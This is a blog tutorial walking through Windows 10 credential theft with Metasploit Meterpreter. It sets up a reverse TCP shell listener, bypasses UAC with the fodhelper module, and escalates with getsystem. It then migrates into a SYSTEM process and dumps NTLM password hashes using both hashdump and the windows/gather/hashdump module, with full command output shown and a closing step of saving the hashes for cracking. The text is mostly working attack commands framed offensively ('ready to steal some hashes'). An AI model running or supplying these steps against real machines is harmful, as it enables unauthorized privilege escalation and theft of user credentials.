Meterpreter hash dump with windows 10

So let’s assume you have been able to gain access to the target machine. In this instance I have access with meterpreter as detailed in previous tutorial. We then bypassed UAC to elevate our privileges.

$ msfconsole
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.15
msf6 > set LPORT 4444
msf6 > exploit
meterpreter > getuid
meterpreter > getsystem

When we run the above you will find getsystem fails

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > 
setting up meterpreter session

To elevate the system privileges we will bypass UAC

first we will background our active session

meterpreter > background

and then using bypassuac with fodhelper

msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

we will now be back in our active session, and be able to successfully run getsystem to elevate to full admin privileges.

getsystem and bypassuac with fodhelper

Now we are ready to steal some hashes! lets see what happens when we run hashdump

hashdump operation failed: The parameter is incorrect

It fails still

meterpreter > hashdump
[-] 2007: Operation failed: The parameter is incorrect.

What can we d to fix this and get some hashes? Well, we ned to migrate to a process that is running under system. Let’s take a look at the running processes using the ps command

meterpreter > ps

we will get a list of all running processes, we need to identify one that is running under SYSTEM user

list of processes running on target machine

We will use the migrate command to attach to this process.

meterpreter > migrate 248
[*] Migrating from 7720 to 248...
[*] Migration completed successfully.
meterpreter > 

Once we have migrated to this process we will run hashdump again.

meterpreter > hashdump

this time we get a result!

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
meterpreter > 

METHOD 2

There is another way to get a hashdump using a metasploit module. Once you have control over the session and elevated permission, background the session and switch to use a new module.

meterpreter > background
msf6 > use windows/gather/hashdump
msf6 > set SESSION 2
msf6 > run

Here we have switch metasploit to use the windows/gather/hashdump exploit, attached it to our elevated admin session and then run the exploit. When we do this you will get a readout of the passwords also.

msf6 post(windows/gather/hashdump) > set SESSION 2
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 5062b47b183427f814c3cbdad04994e6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::


[*] Post module execution completed

This can also locate password hints if available.

hashdump using the metasploit windows/gather/hashdump exploit

Now we can copy and paste these and save them to a txt file on our system for cracking.

Advertisement

One thought on “Meterpreter hash dump with windows 10

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: